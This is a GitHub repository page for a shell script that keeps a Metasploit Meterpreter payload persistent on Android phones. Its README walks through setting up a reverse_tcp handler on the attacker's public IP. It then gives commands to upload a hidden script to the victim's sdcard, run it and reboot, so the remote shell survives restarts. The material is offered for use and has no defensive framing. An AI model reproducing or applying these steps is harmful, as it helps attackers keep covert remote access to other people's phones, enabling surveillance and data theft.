Skip to content

metasploit payload persistence script on android smartphone

License

Notifications You must be signed in to change notification settings

nayeemnazmul/msf-persistance-android

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

MSF PERSISTANCE ANDROID

msf android

INDEX

INTRODUCTION

This script allows the persistence of the payload on Android smartphone with Metasploit.

PREREQUISITES

Use Metasploit

USE

1 - Put the msf-persistance-android.sh script in your personal folder and rename .sh

2 - Open MSF

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost YOUR IP PUBLIC
set lport THE PORT OF YOUR CHOIX
exploit

3 - Copier/Paste in a terminal in shell MSF with a session android/meterpreter/reverse_tcp

cd /
cd sdcard
upload ~/.sh
shell
cd /
cd sdcard
sh .sh
reboot
exit

LICENSE

GPLv3+

About

metasploit payload persistence script on android smartphone

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%